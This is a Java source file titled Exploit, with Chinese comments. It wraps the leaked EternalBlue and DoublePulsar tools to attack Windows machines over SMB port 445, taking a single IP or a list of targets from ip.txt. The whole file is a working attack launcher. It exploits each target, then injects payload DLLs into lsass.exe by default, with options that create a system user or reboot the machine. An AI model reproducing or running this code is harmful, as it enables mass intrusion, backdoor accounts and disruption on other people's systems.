import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.InputStreamReader;
import java.net.URISyntaxException;
import java.net.URL;

/**
 * Created by 1135 on 2017/5/3.
 */
public class Exploit {

    public void runCMD(String command) throws Exception {
        Process p = Runtime.getRuntime().exec("cmd /c cmd.exe /c " + command + " exit");//cmd /c dir   执行完dir命令后关闭窗口。


        //runCMD_bat("C:\\1.bat");/调用
        //Process p = Runtime.getRuntime().exec("cmd /c start cmd.exe /c " + path + " exit");//显示窗口 打开一个新窗口后执行dir指令(原窗口会关闭)


        BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
        String readLine = br.readLine();
        while (readLine != null) {
            readLine = br.readLine();
            System.out.println(readLine);
        }
        if (br != null) {
            br.close();
        }
        p.destroy();
        p = null;
    }





    public void EBexp_function() {




        URL url = getClass().getProtectionDomain().getCodeSource().getLocation();
        File myfile = null;
        try {
            myfile = new File(url.toURI());
        } catch (URISyntaxException e) {
            e.printStackTrace();
        }
        File dir = myfile.getParentFile(); //jar文件所在的绝对目录





        String ip = null;
        String port = null;
        String TargetOS = null;
        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));

        try {

            //ip
            System.out.println("input TargetIpAddress or list (Default. The 'list' will use ip.txt):");
            ip = br.readLine();
            //在命令执行前判断



            //port
            System.out.println("input TargetPort(Default:445):");
            port = br.readLine();
            if (port.equals("")) port = "445";
            //port为空,则设置为445  否则则为用户输入的值

            //TargetOS
            System.out.println("input TargetOS(Default:WIN72K8R2 other:XP):");
            TargetOS = br.readLine();
            if (TargetOS.equals("")) TargetOS = "WIN72K8R2";


            //files文件夹内放着nsa工具
            //dlls文件夹里放着攻击载荷 x86/x64  dll文件
            //logs文件夹里放着命令执行结果  格式为EB/DP_ip_port.txt 如EB_192.168.0.1_445.txt


            if (ip.equals("list")||ip.equals("")) {
                /**
                 * 一行一行读取文件,适合字符读取,若读取中文字符时会出现乱码
                 *流的关闭顺序:先打开的后关,后打开的先关, 否则有可能出现java.io.IOException: Stream closed异常
                 */

                try {

                    //System.out.println(dir);

                    File file = new File(dir+File.separator+"ip.txt");
                    String tempString = null;

                    BufferedReader reader = null;
                    try {//以行为单位读取文件内容,一次读一整行
                        reader = new BufferedReader(new FileReader(file));
                        int line = 1;
                        // 一次读入一行,直到读入null为文件结束
                        while ((tempString = reader.readLine()) != null) {
                            // 显示行号

                            tempString = tempString.trim();
                            System.out.println(line + " CurrentIP "  + tempString);
                            System.out.println(tempString);
                            String EBexpCommand = "C:\\Windows\\System32\\cmd.exe /c files\\Eternalblue-2.2.0.exe --InConfig " + dir+File.separator+"files"+File.separator +"Eternalblue-2.2.0.xml"+ " --TargetIp " + tempString + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+"EB_" + tempString + "_" + port + ".txt" + " --Target " + TargetOS;

                            System.out.println(EBexpCommand);
                            runCMD(EBexpCommand);
                            line++;
                        }
                        reader.close();
                    } catch (Exception e) {
                    }
                    finally {
                        if (reader != null) {
                            try {
                                reader.close();
                            } catch (Exception e)
                            {
                            }
                        }
                    }



                }
                catch(Exception e) {
                    e.printStackTrace();
                }

            } else {

                String EBexpCommand = "C:\\Windows\\System32\\cmd.exe /c files\\Eternalblue-2.2.0.exe --InConfig files\\Eternalblue-2.2.0.xml --TargetIp " + ip + " --TargetPort " + port + " --OutConfig " +dir+File.separator+"logs" +File.separator+"EB_" + ip + "_" + port + ".txt" + " --Target " + TargetOS;
                System.out.println(EBexpCommand);
                runCMD(EBexpCommand);
            }


        } catch (Exception e) {
        }
    }






    public void DPexp_function() {


        URL url = getClass().getProtectionDomain().getCodeSource().getLocation();
        File myfile = null;
        try {
            myfile = new File(url.toURI());
        } catch (URISyntaxException e) {
            e.printStackTrace();
        }
        File dir = myfile.getParentFile(); //jar文件所在的绝对目录

        String networkTimeout = null;
        String ip = null;
        String port = null;
        String protocol = null;
        String architecture = null;
        String function = null;
        String payload = null;
        String dllordinal = null;
        String processName = null;
        String processCommandLine =null;



        BufferedReader br = new BufferedReader(new InputStreamReader(System.in));

        try {
            //ip
            System.out.println("input TargetIpAddress or list (Default. The 'list' will use ip.txt):");
            ip = br.readLine();
            //在命令执行前判断

            //port
            System.out.println("input TargetPort(Default:445):");
            port = br.readLine();
            if (port.equals("")) port = "445";
            //port为空,则设置为445  否则则为用户输入的值

            //protocol
            System.out.println("input protocol(Default:SMB other:RDP):");
            protocol = br.readLine();
            if (protocol.equals("")) protocol = "SMB";

            //architecture
            System.out.println("input architecture(Default:x64 other:x86):");
            architecture = br.readLine();
            if (architecture.equals("")) architecture = "x64";

            //Function
            System.out.println("input Function(Default:RunDll): \n other:\nPing(Check whether the backdoor is installed)" +
                    "\nOutPutInstall(Generate a shellcode)" +
                    "\nRunShellcode" +
                    "Uninstall");

            function = br.readLine();
            if (function.equals("")) function = "RunDLL";

            //payload
            System.out.println("input payloadDllname(Default:x64createSysUser.dll other: X64reboot.dll X86reboot.dll x64createSysUser.dll x86createSysUser.dll your.dll):");
            payload = br.readLine();
            if (payload.equals("")) payload = "x64createSysUser.dll";

            //payloadDllOrdinal 默认1 : The exported ordinal number of the DLL being injected to call
            System.out.println("input payloadDllOrdinal(Default:1):");
            dllordinal = br.readLine();
            if (dllordinal.equals("")) dllordinal = "1";

            //ProcessName :: Name of process to inject into
            System.out.println("input ProcessName to inject into (Default:lsass.exe other:explorer.exe svchost.exe ):");
            processName = br.readLine();
            if (processName.equals("")) processName = "lsass.exe";

            //ProcessCommandLine :: Command line of process to inject into
            System.out.println("input ProcessCommandLine :: Command line of process to inject into (Default:\"\"):");
            processCommandLine = br.readLine();
            if (processCommandLine.equals("")) processCommandLine = "\"\"";

            //NetworkTimeout
            System.out.println("input NetworkTimeout(Default 60):");
            networkTimeout = br.readLine();
            if (networkTimeout.equals("")) networkTimeout = "60";

            if (ip.equals("list")||ip.equals("")) {
                /**
                 * 一行一行读取文件,适合字符读取,若读取中文字符时会出现乱码
                 *流的关闭顺序:先打开的后关,后打开的先关, 否则有可能出现java.io.IOException: Stream closed异常
                 */

                try {

                    //System.out.println(dir);

                    File file = new File(dir+File.separator+"ip.txt");
                    BufferedReader reader = null;
                    try {//以行为单位读取文件内容,一次读一整行
                        reader = new BufferedReader(new FileReader(file));
                        String tempString = null;
                        int line = 1;
                        // 一次读入一行,直到读入null为文件结束
                        while ((tempString = reader.readLine()) != null) {
                            // 显示行号
                            System.out.println(line + " CurrentIP "  + tempString);

                            String DPexpCommand = "C:\\Windows\\System32\\cmd.exe /c "+ dir +File.separator+"files"+File.separator+"Doublepulsar-1.3.1.exe --InConfig " + dir+File.separator+"files"+File.separator +"Doublepulsar-1.3.1.xml --TargetIp " + tempString + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+ "DP_" + tempString + "_" + port + ".txt" + " --Protocol " + protocol + " --Architecture " + architecture + " --Function " + function + " --DllPayload " +dir +File.separator+"dlls"+File.separator+payload +" --payloadDllOrdinal "+dllordinal+" --ProcessName "+processName+" --ProcessCommandLine "+processCommandLine+" --NetworkTimeout "+networkTimeout;
                            System.out.println(DPexpCommand);
                            runCMD(DPexpCommand);

                            line++;
                        }
                        reader.close();
                    } catch (java.io.FileNotFoundException e)
                    {
                        System.err.println("Can't find file ip.txt in jar file directory.");
                    }
                    catch (Exception e) {
                        e.printStackTrace();
                    }
                    finally {
                        if (reader != null) {
                            try {
                                reader.close();
                            } catch (Exception e)
                            {
                            }
                        }
                    }


                }
                catch(Exception e) {
                    e.printStackTrace();
                }

            } else {

                //System.out.println(networkTimeout+ip+port+processCommandLine+protocol);

                            /*
                            String networkTimeout = null;
                            String ip = null;
                            String port = null;
                            String protocol = null;
                            String architecture = null;
                            String function = null;
                            String payload = null;
                            String dllordinal = null;
                            String processName = null;
                            String processCommandLine =null;
                            */



                String DPexpCommand = "C:\\Windows\\System32\\cmd.exe /c "+ dir +File.separator+"files"+File.separator+"Doublepulsar-1.3.1.exe --InConfig " + dir+File.separator+"files"+File.separator +"Doublepulsar-1.3.1.xml --TargetIp " + ip + " --TargetPort " + port + " --OutConfig " + dir+File.separator+"logs" +File.separator+ "DP_" + ip + "_" + port + ".txt" + " --Protocol " + protocol + " --Architecture " + architecture + " --Function " + function + " --DllPayload " +dir +File.separator+"dlls"+File.separator+payload +" --payloadDllOrdinal "+dllordinal+" --ProcessName "+processName+" --ProcessCommandLine "+processCommandLine+" --NetworkTimeout "+networkTimeout;
                System.out.println(DPexpCommand);
                runCMD(DPexpCommand);
            }

        } catch (Exception e)

        {
        }

        //System.out.println(new Date());
        //runCMD_bat(DPexpCommand);
        //System.out.println(new Date());
    }
}